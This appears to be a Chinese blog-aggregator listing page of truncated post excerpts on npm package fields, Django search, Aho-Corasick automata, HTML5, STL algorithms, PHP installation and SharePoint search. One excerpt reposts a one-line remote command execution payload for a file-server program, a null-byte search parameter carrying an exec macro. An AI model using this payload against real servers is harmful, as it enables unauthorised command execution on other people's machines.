Name
必须字段。
小提示:
l 不要在name中包含js, node字样;
l 这个名字最终会是URL的一部分,命令行的参数,目录名,所以不能以点号或下划线开头;
l 这个名字可能在require()方法中被调用,所以应该尽可能短;
Version
必须字段。
Description
可选字段,必须是字符串。npm search的时候会用到。
Keywords
可选...
分类:
Web程序 时间:
2014-09-15 17:52:49
阅读次数:
273
django版本1.4.5一般网站都是需要搜索栏目的,我的项目也需要,于是做了首先,写视图 1 #这个并不是我的项目,仅仅用它做个例子,解决相关问题 2 from django.db.models import Q 3 from models import Book 4 5 def search(....
分类:
其他好文 时间:
2014-09-15 17:26:09
阅读次数:
226
题目大意:给定一些单词和一个字符串,求有多少单词在字符串中出现过
首先我不想吐槽题号。真的不想。真的不想!!别问我为什么说这句话!!不想就是了!!
AC自动机模板题
简单介绍一下AC自动机
首先不要把这东西和自动AC机弄混 自动AC机算法等我们发明之后再加介绍
这东西的实现方法就是把所有单词插入一棵Trie树 然后在Trie树上跑KMP算法
每个节点有一个next指针 和KMP算法...
分类:
其他好文 时间:
2014-09-15 14:21:49
阅读次数:
176
从某论坛看见的,转载部分: 这个程序在国内用的特别多,特别是那些抓肉鸡的黑阔。http://localhost:80/?search==%00{.exec|cmd.}http://localhost:80/search=%00{.exec|cmd.}注:有些版本search前面是没有?的。测试部分:...
分类:
其他好文 时间:
2014-09-15 12:55:38
阅读次数:
229
HTML5 知识点(1)语义化标记 ,,,,,,,,,,(2)表单增强 ①新的INPUT类型: color, email, date, month, week, time, datetime, datetime-local, number, range, search, tel, url ②新属性:...
分类:
Web程序 时间:
2014-09-15 00:51:27
阅读次数:
303
Given a sorted array and a target value, return the index if the target is found. If not, return the index where it would be if it were inserted in order.
You may assume no duplicates in the array....
分类:
其他好文 时间:
2014-09-14 22:10:17
阅读次数:
146
无疑是STL 中最大的一个头文件,它是由一大堆模板函数组成的。下面列举出中的模板函数:adjacent_find / binary_search / copy / copy_backward / count/ count_if / equal / equal_range / fill / fill_...
分类:
其他好文 时间:
2014-09-14 20:43:37
阅读次数:
280
安装php:yum -y install php重启httpd服务激活php:/etc/init.d/httpd restart测试php是否安装完成vim /var/www/html/info.php安装php的组件:搜索php组件:yum search php安装常用组件:yum -y inst...
分类:
Web程序 时间:
2014-09-14 17:59:47
阅读次数:
454
SharePoint 2013 search service 爬网错误诊断三则...
分类:
其他好文 时间:
2014-09-13 21:34:35
阅读次数:
218